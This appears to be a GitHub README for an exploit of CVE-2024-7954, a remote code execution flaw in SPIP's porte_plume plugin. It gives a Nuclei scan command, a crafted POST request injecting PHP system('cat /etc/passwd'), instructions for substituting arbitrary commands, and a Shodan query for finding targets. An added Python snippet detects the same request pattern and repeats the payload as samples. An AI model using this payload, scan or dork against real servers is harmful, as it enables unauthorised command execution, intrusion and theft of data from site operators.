MuhammadWaseem29 / RCE-CVE-2024-7954

Repository from GitHub: https://github.com/MuhammadWaseem29/RCE-CVE-2024-7954

RCE_CVE-2024-7954

Description

The porte_plume plugin, shipped with SPIP versions prior to 4.30-alpha2, 4.2.13, and 4.1.16, is affected by a critical remote code execution (RCE) vulnerability. The flaw allows a remote, unauthenticated attacker to execute arbitrary PHP code as the SPIP user by sending a specially crafted HTTP request. The impact is severe: an attacker can run commands on the server, which could lead to unauthorized access, data breaches, or further compromise of the system.

Vulnerability Details

  • Affected Software: SPIP (prior to versions 4.30-alpha2, 4.2.13, and 4.1.16)
  • Type of Vulnerability: Remote Code Execution (RCE)
  • Severity Level: Critical
  • Exploitability: Remote and unauthenticated attackers can exploit this vulnerability.

Exploit

Nuclei Scan

kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml

An example of a crafted HTTP request that can be used to exploit this vulnerability is as follows:

POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Explanation of the Exploit:

  • The POST request is directed to the porte_plume_previsu action of SPIP's index.php file.
  • The data parameter contains a payload that leverages PHP's system() function to execute a shell command (in this case, cat /etc/passwd), which reads the contents of the password file.
  • By changing the PHP code in the payload, an attacker could execute any PHP code or system command on the server, leading to severe consequences.
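As an added defensive example (not part of this repository), the following Python snippet parses raw HTTP requests and flags those matching the pattern described above: the porte_plume_previsu action with a PHP open tag inside the data parameter. The sample requests and host names are constructed for the demonstration.

```python
"""Flag HTTP requests matching the CVE-2024-7954 request pattern (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

VULN_ACTION = "porte_plume_previsu"           # action targeted by the crafted request
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, query dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    url = urlsplit(target)
    return method, url.path, parse_qs(url.query), body


def is_cve_2024_7954_attempt(raw: str) -> bool:
    """True if the request hits the previsu action with a PHP open tag in `data`."""
    method, _path, query, body = parse_request(raw)
    if VULN_ACTION not in query.get("action", []):
        return False
    # parse_qs URL-decodes the values, so encoded payloads are normalised here.
    params = parse_qs(body) if method == "POST" else query
    return any(PHP_OPEN_TAG.search(v) for v in params.get("data", []))


def scan(requests: dict) -> list:
    """Return the names of all requests that look like exploitation attempts."""
    return [name for name, raw in requests.items() if is_cve_2024_7954_attempt(raw)]


# Constructed samples: the request from the README, a URL-encoded variant of it,
# and a benign preview of ordinary editor markup on the same endpoint.
HDR = ("POST /index.php?action=porte_plume_previsu HTTP/1.1\r\n"
       "Host: spip.example\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n")
SAMPLE_REQUESTS = {
    "readme_payload": HDR + "data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB",
    "encoded_payload": HDR + "data=AA_%5B-%3EURL%3C%3Fphp+system%28%27cat+%2Fetc"
                             "%2Fpasswd%27%29%3B+%3F%3E%5D_BB",
    "benign_preview": HDR + "data=Bonjour+[->https://example.org]",
}

if __name__ == "__main__":
    print(scan(SAMPLE_REQUESTS))   # ['readme_payload', 'encoded_payload']
```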

Shodan Dork

To identify potentially vulnerable SPIP installations, the following Shodan search query can be used:

app="SPIP"

This vulnerability underscores the importance of keeping software up to date and implementing robust security measures to protect against exploitation.
